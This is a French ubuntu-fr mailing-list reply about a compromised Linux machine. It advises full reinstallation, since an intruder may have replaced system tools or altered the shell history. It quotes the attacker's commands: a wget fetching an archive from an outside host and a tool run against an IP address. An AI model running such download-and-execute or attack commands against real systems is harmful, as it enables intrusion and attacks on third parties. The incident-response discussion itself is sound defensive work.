Le 28/03/06, Free Mind<[EMAIL PROTECTED]> a écrit : > On 3/27/06, L. Boggio <[EMAIL PROTECTED]> wrote:
[...] > > Bon, désolé, mais avec ces 2 lignes : > > > > wget http://rooot.xhost.ro/fld.tgz > > et > > ./x 200.68.192.253 53 0 > > > > On a la preuve qu'il a téléchargé un programme et qu'il l'a exécuté, > > donc, tu ne peux pas savoir ce qu'il a fait. > > De ce fait, tu ne peux plus rien croire dans ta machine : LS a pu être > > remplécé, PS a pu être remplacé, etc... > > Si tu es parano et/ou que tu as des choses sensibles, la SEULE solution > > sure est la réinstallation après formatage de ta machine :( > > > > Je pense que je l'ai interrompu et qu'il était au début du processus et en > effet, les scripts sont lisibles... donc je vais plutôt tenter d'analyser ce > qu'il y a la dedans. Je suis allé zieuté les scripts des sites aimablements laissés en ligne par le crétin en question. Pour le moment, il n'a pas l'air d'avoir eu le temps de faire quelque chose. **MAIS** rien ne t'assure qu'il ne s'agit pas d'un hameçon laissé là pour te faire croire autre chose. Si le gars est vicieux, il peut très bien avoir transformé ton history - et les traces ad hoc - pour laisser croire qu'il n'a pas eu le temps de faire quelque chose. La **SEULE** solution sure est de réinstaller la machine (mais rien ne t'empêche de jouer avec pour tenter de remonter la piste); La sécurité, c'est être paranoïaque. PK -- |\ _,,,---,,_ Patrice KARATCHENTZEFF ZZZzz /,`.-'`' -. ;-;;,_ mailto:[EMAIL PROTECTED] |,4- ) )-,_. ,\ ( `'-' http://p.karatchentzeff.free.fr '---''(_/--' `-'\_) -- ubuntu-fr mailing list ubuntu-fr@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-fr
